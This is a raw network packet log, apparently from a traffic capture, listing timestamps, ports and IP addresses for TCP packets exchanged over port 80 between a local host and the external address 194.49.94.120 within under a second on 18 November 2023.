Nov 18, 2023 10:02:37.437195063 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437203884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437212944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437231064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437256098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437259912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437273979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437278032 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437289953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437308073 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437323093 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437325954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437341928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437357903 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437359095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437375069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437387943 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437424898 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437488079 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437505007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437520981 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437536955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437549114 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437553883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437570095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437582016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437586069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437602043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437613964 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437618971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437634945 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437647104 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437652111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437669992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437678099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437689066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437705994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437714100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437722921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437740088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437756062 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437756062 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437774897 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437777996 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437798023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437814951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437833071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437841892 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437850952 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437866926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437876940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437884092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437896967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437931061 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.437959909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437978029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.437994957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438011885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438029051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438030005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.438046932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438051939 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.438064098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438081980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438098907 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438108921 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.438116074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438133001 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438141108 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.438149929 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438167095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.438167095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438184977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438201904 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.438201904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.438237906 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.438668966 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.440614939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.440848112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.440885067 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.441462040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441485882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441502094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441546917 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.441560030 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441579103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441596031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441606045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.441612959 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441629887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441646099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.441648006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.441680908 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.442223072 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.442240953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.442279100 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443064928 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443083048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443145037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443257093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443305016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443306923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443383932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443401098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443444967 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443514109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443531036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443562984 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443609953 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443627119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443658113 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443742990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443759918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443799019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443814039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443830967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443847895 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443857908 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443878889 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443892956 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443897009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443939924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.443943977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.443999052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444017887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444061995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.444088936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444133043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.444158077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444175005 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444192886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444235086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.444407940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444449902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444451094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.444467068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444483995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444533110 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.444549084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444565058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444595098 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.444648027 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444689989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.444730997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444749117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444766045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.444808006 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.444993019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445008993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445028067 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445036888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445044994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445061922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445075989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445079088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445111036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445223093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445271015 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445293903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445311069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445327997 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445344925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445355892 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445363045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445441008 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445445061 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445463896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445480108 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445497036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445518970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445535898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445545912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445553064 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445569992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445578098 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445585966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445601940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445610046 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445620060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445647955 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445770979 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445816040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.445837021 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445854902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445872068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.445914030 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446346045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446418047 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446436882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446453094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446470022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446486950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446491957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446504116 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446521044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446528912 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446574926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446660042 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446676970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446691990 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446708918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446724892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446733952 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446742058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446757078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446772099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446773052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446789980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446799994 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446805954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446822882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446830034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446840048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446856022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446866989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446871996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446887970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446892023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446903944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446921110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446934938 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446938038 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446954966 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446971893 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446974039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.446990013 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.446997881 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.447005987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447016954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.447022915 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447037935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447053909 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.447056055 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447071075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447081089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447089911 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447098017 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447113991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447129011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447129011 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.447145939 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447161913 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447179079 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447196007 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447212934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447225094 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.447228909 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447242975 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.447246075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447263002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447278976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447288036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.447294950 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.447314024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.447339058 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.449487925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.449505091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.449521065 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.449537992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.449559927 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.449588060 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.454152107 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454169989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454185963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454231024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.454267979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.454422951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454440117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454457045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454488039 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.454507113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454560995 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.454648972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454735994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454752922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454776049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454792976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454804897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.454809904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.454843998 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.454864979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.455459118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455476999 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455552101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455557108 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.455590963 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455607891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455625057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455641031 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455645084 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.455667973 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.455718994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455738068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455754995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455775023 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.455794096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455794096 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.455811977 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455858946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.455950022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455969095 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.455986023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456002951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456017971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456022024 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456310987 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456367970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456367970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456387043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456404924 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456428051 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456455946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456487894 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456505060 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456521988 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456547976 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456585884 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456625938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456643105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456660032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456676006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456692934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456693888 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456712008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456717968 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456768036 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456779957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456798077 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456815004 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456831932 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456841946 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456847906 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456864119 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456875086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456880093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456895113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456923008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456933022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:37.456939936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:37.456954956 CET	80	49744	194.49.94.120	192.168.2.4
